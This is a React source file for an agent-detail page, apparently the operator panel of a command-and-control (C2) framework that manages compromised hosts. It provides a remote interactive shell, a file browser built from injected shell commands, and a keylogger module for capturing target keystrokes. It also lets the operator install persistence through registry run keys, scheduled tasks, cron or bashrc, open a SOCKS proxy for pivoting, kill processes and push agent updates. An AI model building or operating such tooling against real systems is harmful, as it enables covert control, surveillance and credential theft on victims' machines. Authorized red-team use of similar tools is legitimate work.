import React, { useEffect, useState } from 'react';
import { useParams, useNavigate } from 'react-router-dom';
import { useDispatch, useSelector } from 'react-redux';
import { fetchAgent, clearSelectedAgent } from '../store/agentsSlice';
import { executeShell, fetchTasks } from '../store/tasksSlice';
import { formatDistanceToNow } from 'date-fns';
import api from '../services/api';

function AgentDetail() {
  const { agentId } = useParams();
  const navigate = useNavigate();
  const dispatch = useDispatch();
  const { selectedAgent: agent, loading } = useSelector((state) => state.agents);
  const { tasks } = useSelector((state) => state.tasks);
  
  const [command, setCommand] = useState('');
  const [agentTasks, setAgentTasks] = useState([]);
  const [activeTab, setActiveTab] = useState('info');
  
  // File browser state
  const [currentPath, setCurrentPath] = useState('');
  const [fileListTaskId, setFileListTaskId] = useState(null);
  const [files, setFiles] = useState([]);
  const [filesLoading, setFilesLoading] = useState(false);
  const [pathInput, setPathInput] = useState('');
  
  // Modules state
  const [processes, setProcesses] = useState([]);
  const [processesLoading, setProcessesLoading] = useState(false);
  const [processTaskId, setProcessTaskId] = useState(null);
  const [selectedPersistence, setSelectedPersistence] = useState('registry');

  useEffect(() => {
    dispatch(fetchAgent(agentId));
    loadAgentTasks();
    
    return () => {
      dispatch(clearSelectedAgent());
    };
  }, [dispatch, agentId]);

  const loadAgentTasks = async () => {
    try {
      const res = await api.get(`/agents/${agentId}/tasks`);
      setAgentTasks(res.data.tasks);
    } catch (error) {
      console.error('Failed to load tasks:', error);
    }
  };

  // File browser functions
  const browseDirectory = async (path = '') => {
    setFilesLoading(true);
    setFiles([]);
    
    // Determine the command based on OS
    const isWindows = agent?.os_type?.toLowerCase() === 'windows';
    let listCmd;
    
    if (isWindows) {
      const targetPath = path || 'C:\\';
      listCmd = `powershell -Command "Get-ChildItem -Path '${targetPath}' | Select-Object Mode,LastWriteTime,Length,Name | ConvertTo-Json -Compress"`;
      setCurrentPath(targetPath);
      setPathInput(targetPath);
    } else {
      const targetPath = path || '/';
      listCmd = `ls -la '${targetPath}' 2>/dev/null | tail -n +2`;
      setCurrentPath(targetPath);
      setPathInput(targetPath);
    }
    
    try {
      const res = await api.post(`/agents/${agentId}/tasks`, {
        task_type: 'shell',
        command: listCmd
      });
      setFileListTaskId(res.data.task.task_id);
    } catch (error) {
      console.error('Failed to list directory:', error);
      setFilesLoading(false);
    }
  };

  // Poll for file listing result
  useEffect(() => {
    if (!fileListTaskId) return;
    
    const pollInterval = setInterval(async () => {
      try {
        const res = await api.get(`/tasks/${fileListTaskId}`);
        const task = res.data.task;
        
        if (task.status === 'completed' && task.result) {
          setFilesLoading(false);
          clearInterval(pollInterval);
          parseFileList(task.result);
          setFileListTaskId(null);
        } else if (task.status === 'failed') {
          setFilesLoading(false);
          clearInterval(pollInterval);
          setFileListTaskId(null);
        }
      } catch (error) {
        console.error('Poll error:', error);
      }
    }, 2000);
    
    return () => clearInterval(pollInterval);
  }, [fileListTaskId]);

  const parseFileList = (result) => {
    const isWindows = agent?.os_type?.toLowerCase() === 'windows';
    const parsedFiles = [];
    
    if (isWindows) {
      // Parse PowerShell JSON output
      try {
        let data = JSON.parse(result);
        if (!Array.isArray(data)) data = [data];
        
        data.forEach(item => {
          parsedFiles.push({
            name: item.Name,
            isDir: item.Mode?.startsWith('d') || false,
            size: item.Length || 0,
            modified: item.LastWriteTime,
            mode: item.Mode
          });
        });
      } catch (e) {
        // Fallback: parse as text if JSON fails
        const lines = result.split('\n').filter(l => l.trim());
        lines.forEach(line => {
          const parts = line.trim().split(/\s+/);
          if (parts.length >= 4) {
            const name = parts.slice(3).join(' ');
            parsedFiles.push({
              name: name,
              isDir: parts[0]?.startsWith('d') || false,
              size: parseInt(parts[2]) || 0,
              mode: parts[0]
            });
          }
        });
      }
    } else {
      // Parse Linux ls -la output
      const lines = result.split('\n').filter(l => l.trim());
      lines.forEach(line => {
        const parts = line.trim().split(/\s+/);
        if (parts.length >= 9) {
          const name = parts.slice(8).join(' ');
          if (name !== '.' && name !== '..') {
            parsedFiles.push({
              name: name,
              isDir: parts[0]?.startsWith('d') || false,
              size: parseInt(parts[4]) || 0,
              modified: `${parts[5]} ${parts[6]} ${parts[7]}`,
              mode: parts[0],
              owner: parts[2],
              group: parts[3]
            });
          }
        }
      });
    }
    
    // Sort: directories first, then by name
    parsedFiles.sort((a, b) => {
      if (a.isDir && !b.isDir) return -1;
      if (!a.isDir && b.isDir) return 1;
      return a.name.localeCompare(b.name);
    });
    
    setFiles(parsedFiles);
  };

  const navigateToPath = (fileName, isDir) => {
    if (!isDir) return;
    
    const isWindows = agent?.os_type?.toLowerCase() === 'windows';
    const separator = isWindows ? '\\' : '/';
    
    let newPath;
    if (fileName === '..') {
      // Go up one directory
      const parts = currentPath.split(separator).filter(p => p);
      parts.pop();
      newPath = isWindows ? (parts.length > 0 ? parts.join(separator) : 'C:\\') : '/' + parts.join('/');
    } else {
      newPath = currentPath.endsWith(separator) 
        ? currentPath + fileName 
        : currentPath + separator + fileName;
    }
    
    browseDirectory(newPath);
  };

  const formatFileSize = (bytes) => {
    if (!bytes || bytes === 0) return '-';
    const units = ['B', 'KB', 'MB', 'GB'];
    let i = 0;
    while (bytes >= 1024 && i < units.length - 1) {
      bytes /= 1024;
      i++;
    }
    return `${bytes.toFixed(1)} ${units[i]}`;
  };

  const handleExecuteCommand = async (e) => {
    e.preventDefault();
    if (!command.trim()) return;
    
    await dispatch(executeShell({ agentId, command }));
    setCommand('');
    loadAgentTasks();
  };

  if (loading || !agent) {
    return (
      <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'center', height: '100%' }}>
        <div className="loader"></div>
      </div>
    );
  }

  return (
    <>
      <header className="main-header">
        <div style={{ display: 'flex', alignItems: 'center', gap: 'var(--spacing-md)' }}>
          <button className="btn btn-ghost" onClick={() => navigate('/agents')}>
            ← Back
          </button>
          <h1 className="page-title">{agent.hostname || 'Unknown Agent'}</h1>
          <span className={`status-dot ${agent.is_online ? 'online' : 'offline'}`}></span>
        </div>
        <div className="header-actions">
          <code style={{ color: 'var(--neon-cyan)' }}>{agent.agent_id}</code>
        </div>
      </header>

      <div className="main-body">
        {/* Agent Info Cards */}
        <div className="stats-grid" style={{ marginBottom: 'var(--spacing-xl)' }}>
          <div className="stat-card">
            <div className="stat-label">Status</div>
            <div className="stat-value" style={{ 
              color: agent.is_online ? 'var(--neon-green)' : 'var(--neon-red)',
              fontSize: '24px'
            }}>
              {agent.is_online ? '● ONLINE' : '○ OFFLINE'}
            </div>
            <div className="stat-change">
              Last seen: {agent.last_seen && formatDistanceToNow(new Date(agent.last_seen), { addSuffix: true })}
            </div>
          </div>
          <div className="stat-card cyan">
            <div className="stat-label">Operating System</div>
            <div className="stat-value" style={{ fontSize: '20px' }}>
              {agent.os_type === 'windows' ? '🪟' : agent.os_type === 'linux' ? '🐧' : '🍎'} {agent.os_type}
            </div>
            <div className="stat-change">{agent.os_version}</div>
          </div>
          <div className="stat-card purple">
            <div className="stat-label">Location</div>
            <div className="stat-value" style={{ fontSize: '20px' }}>
              {agent.country || 'Unknown'}
            </div>
            <div className="stat-change">{agent.city || 'Unknown city'}</div>
          </div>
          <div className="stat-card orange">
            <div className="stat-label">Pending Tasks</div>
            <div className="stat-value">{agent.pending_tasks || 0}</div>
            <div className="stat-change">
              Beacon: {agent.beacon_interval}s ± {agent.jitter}%
            </div>
          </div>
        </div>

        {/* Tabs */}
        <div style={{ 
          display: 'flex', 
          gap: 'var(--spacing-sm)', 
          marginBottom: 'var(--spacing-lg)',
          borderBottom: '1px solid var(--border-color)',
          paddingBottom: 'var(--spacing-md)'
        }}>
          {['info', 'shell', 'tasks', 'files', 'modules', 'processes'].map(tab => (
            <button
              key={tab}
              className={`btn ${activeTab === tab ? 'btn-primary' : 'btn-ghost'}`}
              onClick={() => setActiveTab(tab)}
              style={{ textTransform: 'capitalize' }}
            >
              {tab}
            </button>
          ))}
        </div>

        {/* Tab Content */}
        {activeTab === 'info' && (
          <div className="card">
            <div className="card-header">
              <h3 className="card-title">System Information</h3>
            </div>
            <div className="card-body">
              <div style={{ display: 'grid', gridTemplateColumns: 'repeat(2, 1fr)', gap: 'var(--spacing-lg)' }}>
                <div>
                  <div className="form-label">Hostname</div>
                  <div>{agent.hostname}</div>
                </div>
                <div>
                  <div className="form-label">Username</div>
                  <div>{agent.username}</div>
                </div>
                <div>
                  <div className="form-label">Internal IP</div>
                  <code>{agent.internal_ip}</code>
                </div>
                <div>
                  <div className="form-label">External IP</div>
                  <code>{agent.external_ip}</code>
                </div>
                <div>
                  <div className="form-label">Architecture</div>
                  <div>{agent.architecture}</div>
                </div>
                <div>
                  <div className="form-label">Integrity Level</div>
                  <div style={{ 
                    color: agent.is_elevated ? 'var(--neon-red)' : 'var(--text-primary)'
                  }}>
                    {agent.integrity_level} {agent.is_elevated && '(ELEVATED)'}
                  </div>
                </div>
                <div>
                  <div className="form-label">Process</div>
                  <div>{agent.process_name} (PID: {agent.process_id})</div>
                </div>
                <div>
                  <div className="form-label">First Seen</div>
                  <div>{agent.first_seen && new Date(agent.first_seen).toLocaleString()}</div>
                </div>
                <div>
                  <div className="form-label">Agent Version</div>
                  <div style={{ display: 'flex', alignItems: 'center', gap: '10px' }}>
                    <code style={{ 
                      color: agent.agent_version ? 'var(--neon-green)' : 'var(--text-muted)' 
                    }}>
                      {agent.agent_version || 'Unknown'}
                    </code>
                    <span style={{ color: 'var(--text-muted)', fontSize: '12px' }}>
                      ({agent.agent_type || 'unknown'})
                    </span>
                    <button 
                      className="btn btn-sm btn-primary"
                      onClick={async () => {
                        try {
                          await api.post(`/agents/${agent.agent_id}/update`);
                          alert('Update task queued. Agent will update on next beacon.');
                        } catch (error) {
                          alert('Failed to queue update: ' + error.message);
                        }
                      }}
                    >
                      🔄 Update
                    </button>
                  </div>
                </div>
              </div>
            </div>
          </div>
        )}

        {activeTab === 'shell' && (
          <div className="card">
            <div className="card-header">
              <h3 className="card-title">Interactive Shell</h3>
            </div>
            <div className="card-body">
              <form onSubmit={handleExecuteCommand} style={{ marginBottom: 'var(--spacing-lg)' }}>
                <div style={{ display: 'flex', gap: 'var(--spacing-md)' }}>
                  <input
                    type="text"
                    className="form-input"
                    value={command}
                    onChange={(e) => setCommand(e.target.value)}
                    placeholder="Enter command..."
                    style={{ flex: 1, fontFamily: 'var(--font-mono)' }}
                  />
                  <button type="submit" className="btn btn-primary">
                    Execute
                  </button>
                </div>
              </form>

              {/* Command History */}
              <div style={{ 
                background: 'var(--bg-primary)', 
                borderRadius: 'var(--radius-md)',
                padding: 'var(--spacing-md)',
                maxHeight: '400px',
                overflowY: 'auto',
                fontFamily: 'var(--font-mono)',
                fontSize: '12px'
              }}>
                {agentTasks.filter(t => t.task_type === 'shell').slice(0, 20).map(task => (
                  <div key={task.task_id} style={{ marginBottom: 'var(--spacing-md)' }}>
                    <div style={{ color: 'var(--neon-green)' }}>
                      {agent.username}@{agent.hostname}$ {task.command}
                    </div>
                    <div style={{ 
                      color: task.status === 'completed' ? 'var(--text-primary)' : 
                             task.status === 'failed' ? 'var(--neon-red)' : 'var(--text-muted)',
                      whiteSpace: 'pre-wrap',
                      marginTop: 'var(--spacing-xs)'
                    }}>
                      {task.status === 'pending' && '⏳ Pending...'}
                      {task.status === 'sent' && '📤 Sent, awaiting response...'}
                      {task.status === 'completed' && (task.result || '(no output)')}
                      {task.status === 'failed' && `Error: ${task.error_message}`}
                    </div>
                  </div>
                ))}
                {agentTasks.filter(t => t.task_type === 'shell').length === 0 && (
                  <div style={{ color: 'var(--text-muted)' }}>
                    No commands executed yet. Type a command above to begin.
                  </div>
                )}
              </div>
            </div>
          </div>
        )}

        {activeTab === 'tasks' && (
          <div className="card">
            <div className="card-header">
              <h3 className="card-title">Task History</h3>
              <button className="btn btn-sm btn-secondary" onClick={loadAgentTasks}>
                ↻ Refresh
              </button>
            </div>
            <div className="card-body" style={{ padding: 0 }}>
              <table className="table">
                <thead>
                  <tr>
                    <th>Task ID</th>
                    <th>Type</th>
                    <th>Status</th>
                    <th>Created</th>
                    <th>Completed</th>
                  </tr>
                </thead>
                <tbody>
                  {agentTasks.map(task => (
                    <tr key={task.task_id}>
                      <td><code>{task.task_id?.substring(0, 8)}...</code></td>
                      <td>{task.task_type}</td>
                      <td>
                        <span style={{ 
                          color: task.status === 'completed' ? 'var(--neon-green)' : 
                                 task.status === 'failed' ? 'var(--neon-red)' : 
                                 task.status === 'pending' ? 'var(--neon-yellow)' : 'var(--text-secondary)'
                        }}>
                          {task.status}
                        </span>
                      </td>
                      <td>{new Date(task.created_at).toLocaleString()}</td>
                      <td>{task.completed_at && new Date(task.completed_at).toLocaleString()}</td>
                    </tr>
                  ))}
                </tbody>
              </table>
            </div>
          </div>
        )}

        {activeTab === 'files' && (
          <div className="card">
            <div className="card-header">
              <h3 className="card-title">File Browser</h3>
              <div style={{ display: 'flex', gap: 'var(--spacing-sm)' }}>
                <button 
                  className="btn btn-sm btn-secondary"
                  onClick={() => browseDirectory('')}
                  disabled={filesLoading}
                >
                  🏠 Root
                </button>
                <button 
                  className="btn btn-sm btn-secondary"
                  onClick={() => navigateToPath('..', true)}
                  disabled={filesLoading || !currentPath}
                >
                  ⬆️ Up
                </button>
                <button 
                  className="btn btn-sm btn-secondary"
                  onClick={() => browseDirectory(currentPath)}
                  disabled={filesLoading}
                >
                  ↻ Refresh
                </button>
              </div>
            </div>
            <div className="card-body">
              {/* Path bar */}
              <div style={{ 
                display: 'flex', 
                gap: 'var(--spacing-sm)', 
                marginBottom: 'var(--spacing-md)',
                alignItems: 'center'
              }}>
                <span style={{ color: 'var(--text-muted)' }}>Path:</span>
                <input
                  type="text"
                  className="form-input"
                  value={pathInput}
                  onChange={(e) => setPathInput(e.target.value)}
                  onKeyDown={(e) => e.key === 'Enter' && browseDirectory(pathInput)}
                  placeholder={agent?.os_type?.toLowerCase() === 'windows' ? 'C:\\' : '/'}
                  style={{ flex: 1, fontFamily: 'var(--font-mono)' }}
                />
                <button 
                  className="btn btn-primary"
                  onClick={() => browseDirectory(pathInput)}
                  disabled={filesLoading}
                >
                  Go
                </button>
              </div>

              {/* Loading state */}
              {filesLoading && (
                <div style={{ 
                  textAlign: 'center', 
                  padding: 'var(--spacing-xl)', 
                  color: 'var(--text-muted)' 
                }}>
                  <div className="loader" style={{ margin: '0 auto var(--spacing-md)' }}></div>
                  Waiting for agent response... (check back on next beacon)
                </div>
              )}

              {/* Initial state - no path selected */}
              {!filesLoading && !currentPath && files.length === 0 && (
                <div style={{ 
                  textAlign: 'center', 
                  padding: 'var(--spacing-xl)', 
                  color: 'var(--text-muted)' 
                }}>
                  <div style={{ fontSize: '48px', marginBottom: 'var(--spacing-md)' }}>📁</div>
                  <p>Click "Root" or enter a path to browse files</p>
                  <button 
                    className="btn btn-primary"
                    onClick={() => browseDirectory('')}
                    style={{ marginTop: 'var(--spacing-md)' }}
                  >
                    Browse Root Directory
                  </button>
                </div>
              )}

              {/* File listing */}
              {!filesLoading && files.length > 0 && (
                <div style={{ 
                  background: 'var(--bg-primary)', 
                  borderRadius: 'var(--radius-md)',
                  overflow: 'hidden'
                }}>
                  <table className="table" style={{ marginBottom: 0 }}>
                    <thead>
                      <tr>
                        <th style={{ width: '40px' }}></th>
                        <th>Name</th>
                        <th style={{ width: '100px' }}>Size</th>
                        <th style={{ width: '80px' }}>Mode</th>
                        <th style={{ width: '150px' }}>Modified</th>
                      </tr>
                    </thead>
                    <tbody>
                      {files.map((file, idx) => (
                        <tr 
                          key={idx}
                          onClick={() => navigateToPath(file.name, file.isDir)}
                          style={{ 
                            cursor: file.isDir ? 'pointer' : 'default',
                            background: file.isDir ? 'rgba(0, 255, 157, 0.05)' : 'transparent'
                          }}
                          onMouseOver={(e) => file.isDir && (e.currentTarget.style.background = 'rgba(0, 255, 157, 0.1)')}
                          onMouseOut={(e) => e.currentTarget.style.background = file.isDir ? 'rgba(0, 255, 157, 0.05)' : 'transparent'}
                        >
                          <td style={{ fontSize: '18px', textAlign: 'center' }}>
                            {file.isDir ? '📁' : '📄'}
                          </td>
                          <td style={{ 
                            fontFamily: 'var(--font-mono)',
                            color: file.isDir ? 'var(--neon-cyan)' : 'var(--text-primary)'
                          }}>
                            {file.name}
                          </td>
                          <td style={{ 
                            fontFamily: 'var(--font-mono)',
                            color: 'var(--text-muted)',
                            fontSize: '12px'
                          }}>
                            {file.isDir ? '-' : formatFileSize(file.size)}
                          </td>
                          <td style={{ 
                            fontFamily: 'var(--font-mono)',
                            color: 'var(--text-muted)',
                            fontSize: '11px'
                          }}>
                            {file.mode}
                          </td>
                          <td style={{ 
                            color: 'var(--text-muted)',
                            fontSize: '12px'
                          }}>
                            {file.modified || '-'}
                          </td>
                        </tr>
                      ))}
                    </tbody>
                  </table>
                </div>
              )}

              {/* Empty directory */}
              {!filesLoading && currentPath && files.length === 0 && (
                <div style={{ 
                  textAlign: 'center', 
                  padding: 'var(--spacing-xl)', 
                  color: 'var(--text-muted)' 
                }}>
                  <p>Directory is empty or results pending</p>
                  <button 
                    className="btn btn-secondary"
                    onClick={() => browseDirectory(currentPath)}
                    style={{ marginTop: 'var(--spacing-md)' }}
                  >
                    ↻ Refresh
                  </button>
                </div>
              )}
            </div>
          </div>
        )}

        {/* Modules Tab */}
        {activeTab === 'modules' && (
          <div className="modules-grid" style={{ display: 'grid', gridTemplateColumns: 'repeat(auto-fit, minmax(300px, 1fr))', gap: '20px' }}>
            
            {/* Keylogger Module */}
            <div className="card">
              <div className="card-header">
                <h3 className="card-title">⌨️ Keylogger</h3>
                {agent.keylogger_active && (
                  <span className="badge badge-warning">ACTIVE</span>
                )}
              </div>
              <div className="card-body">
                <p style={{ color: 'var(--text-muted)', marginBottom: '15px' }}>
                  Capture keystrokes from the target system.
                </p>
                <div style={{ display: 'flex', gap: '10px' }}>
                  {!agent.keylogger_active ? (
                    <button 
                      className="btn btn-danger"
                      onClick={async () => {
                        await api.post(`/api/agents/${agentId}/keylogger/start`);
                        dispatch(fetchAgent(agentId));
                      }}
                    >
                      Start Keylogger
                    </button>
                  ) : (
                    <>
                      <button 
                        className="btn btn-primary"
                        onClick={async () => {
                          await api.post(`/api/agents/${agentId}/keylogger/dump`);
                          loadAgentTasks();
                        }}
                      >
                        Dump Buffer
                      </button>
                      <button 
                        className="btn btn-ghost"
                        onClick={async () => {
                          await api.post(`/api/agents/${agentId}/keylogger/stop`);
                          dispatch(fetchAgent(agentId));
                        }}
                      >
                        Stop
                      </button>
                    </>
                  )}
                </div>
              </div>
            </div>

            {/* Persistence Module */}
            <div className="card">
              <div className="card-header">
                <h3 className="card-title">🔗 Persistence</h3>
              </div>
              <div className="card-body">
                <p style={{ color: 'var(--text-muted)', marginBottom: '15px' }}>
                  Install persistence mechanism for agent survival.
                </p>
                <div style={{ marginBottom: '15px' }}>
                  <select 
                    className="form-select"
                    value={selectedPersistence}
                    onChange={(e) => setSelectedPersistence(e.target.value)}
                    style={{ width: '100%' }}
                  >
                    <option value="registry">Registry Run Key (Windows)</option>
                    <option value="startup">Startup Folder (Windows)</option>
                    <option value="scheduled_task">Scheduled Task (Windows)</option>
                    <option value="service">Service (Windows/Linux)</option>
                    <option value="cron">Cron Job (Linux)</option>
                    <option value="bashrc">Bashrc (Linux)</option>
                  </select>
                </div>
                <div style={{ display: 'flex', gap: '10px' }}>
                  <button 
                    className="btn btn-danger"
                    onClick={async () => {
                      await api.post(`/api/agents/${agentId}/persist`, { method: selectedPersistence });
                      loadAgentTasks();
                    }}
                  >
                    Install Persistence
                  </button>
                  <button 
                    className="btn btn-ghost"
                    onClick={async () => {
                      await api.post(`/api/agents/${agentId}/persist/remove`, { method: 'all' });
                      loadAgentTasks();
                    }}
                  >
                    Remove All
                  </button>
                </div>
              </div>
            </div>

            {/* SOCKS Proxy Module */}
            <div className="card">
              <div className="card-header">
                <h3 className="card-title">🔌 SOCKS Proxy</h3>
                {agent.socks_proxy_active && (
                  <span className="badge badge-success">PORT {agent.socks_proxy_port}</span>
                )}
              </div>
              <div className="card-body">
                <p style={{ color: 'var(--text-muted)', marginBottom: '15px' }}>
                  Start a SOCKS proxy for pivoting through the agent.
                </p>
                {!agent.socks_proxy_active ? (
                  <button 
                    className="btn btn-primary"
                    onClick={async () => {
                      await api.post(`/api/agents/${agentId}/socks/start`, { port: 1080 });
                      dispatch(fetchAgent(agentId));
                    }}
                  >
                    Start SOCKS Proxy
                  </button>
                ) : (
                  <div>
                    <p style={{ marginBottom: '10px', fontFamily: 'monospace' }}>
                      proxychains -q -f proxy.conf [command]
                    </p>
                    <button 
                      className="btn btn-ghost"
                      onClick={async () => {
                        await api.post(`/api/agents/${agentId}/socks/stop`);
                        dispatch(fetchAgent(agentId));
                      }}
                    >
                      Stop Proxy
                    </button>
                  </div>
                )}
              </div>
            </div>

            {/* Health Metrics */}
            <div className="card">
              <div className="card-header">
                <h3 className="card-title">📊 Health Metrics</h3>
              </div>
              <div className="card-body">
                <div style={{ display: 'grid', gap: '15px' }}>
                  <div>
                    <div style={{ display: 'flex', justifyContent: 'space-between', marginBottom: '5px' }}>
                      <span>CPU Usage</span>
                      <span>{agent.cpu_percent != null ? `${agent.cpu_percent.toFixed(1)}%` : 'N/A'}</span>
                    </div>
                    <div style={{ background: 'var(--bg-primary)', borderRadius: '4px', height: '8px', overflow: 'hidden' }}>
                      <div style={{ 
                        width: `${agent.cpu_percent || 0}%`, 
                        height: '100%', 
                        background: agent.cpu_percent > 80 ? 'var(--neon-red)' : 'var(--neon-green)',
                        transition: 'width 0.3s'
                      }}></div>
                    </div>
                  </div>
                  <div>
                    <div style={{ display: 'flex', justifyContent: 'space-between', marginBottom: '5px' }}>
                      <span>Memory Usage</span>
                      <span>{agent.memory_percent != null ? `${agent.memory_percent.toFixed(1)}%` : 'N/A'}</span>
                    </div>
                    <div style={{ background: 'var(--bg-primary)', borderRadius: '4px', height: '8px', overflow: 'hidden' }}>
                      <div style={{ 
                        width: `${agent.memory_percent || 0}%`, 
                        height: '100%', 
                        background: agent.memory_percent > 80 ? 'var(--neon-red)' : 'var(--neon-cyan)',
                        transition: 'width 0.3s'
                      }}></div>
                    </div>
                  </div>
                  <div>
                    <div style={{ display: 'flex', justifyContent: 'space-between', marginBottom: '5px' }}>
                      <span>Disk Usage</span>
                      <span>{agent.disk_percent != null ? `${agent.disk_percent.toFixed(1)}%` : 'N/A'}</span>
                    </div>
                    <div style={{ background: 'var(--bg-primary)', borderRadius: '4px', height: '8px', overflow: 'hidden' }}>
                      <div style={{ 
                        width: `${agent.disk_percent || 0}%`, 
                        height: '100%', 
                        background: agent.disk_percent > 90 ? 'var(--neon-red)' : 'var(--neon-orange)',
                        transition: 'width 0.3s'
                      }}></div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        )}

        {/* Processes Tab */}
        {activeTab === 'processes' && (
          <div className="card">
            <div className="card-header">
              <h3 className="card-title">🔄 Process List</h3>
              <button 
                className="btn btn-primary"
                onClick={async () => {
                  setProcessesLoading(true);
                  const res = await api.post(`/api/agents/${agentId}/processes`);
                  setProcessTaskId(res.data.task_id);
                }}
                disabled={processesLoading}
              >
                {processesLoading ? 'Loading...' : '↻ Refresh Processes'}
              </button>
            </div>
            <div className="card-body">
              {processesLoading && (
                <div style={{ textAlign: 'center', padding: '40px', color: 'var(--text-muted)' }}>
                  <div className="loader" style={{ margin: '0 auto 15px' }}></div>
                  Waiting for process list... (check back on next beacon)
                </div>
              )}
              {!processesLoading && processes.length === 0 && (
                <div style={{ textAlign: 'center', padding: '40px', color: 'var(--text-muted)' }}>
                  <p>Click "Refresh Processes" to get the process list from the agent.</p>
                </div>
              )}
              {processes.length > 0 && (
                <div style={{ maxHeight: '500px', overflowY: 'auto' }}>
                  <table className="table">
                    <thead>
                      <tr>
                        <th>PID</th>
                        <th>Name</th>
                        <th>User</th>
                        <th>CPU %</th>
                        <th>Mem %</th>
                        <th>Actions</th>
                      </tr>
                    </thead>
                    <tbody>
                      {processes.map((proc, idx) => (
                        <tr key={idx}>
                          <td><code>{proc.pid}</code></td>
                          <td>{proc.name}</td>
                          <td style={{ color: 'var(--text-muted)' }}>{proc.user || '-'}</td>
                          <td>{proc.cpu?.toFixed(1) || '0'}%</td>
                          <td>{proc.mem?.toFixed(1) || '0'}%</td>
                          <td>
                            <button 
                              className="btn btn-sm btn-danger"
                              onClick={async () => {
                                if (window.confirm(`Kill process ${proc.name} (PID: ${proc.pid})?`)) {
                                  await api.post(`/api/agents/${agentId}/processes/${proc.pid}/kill`);
                                  loadAgentTasks();
                                }
                              }}
                            >
                              Kill
                            </button>
                          </td>
                        </tr>
                      ))}
                    </tbody>
                  </table>
                </div>
              )}
            </div>
          </div>
        )}
      </div>
    </>
  );
}

export default AgentDetail;
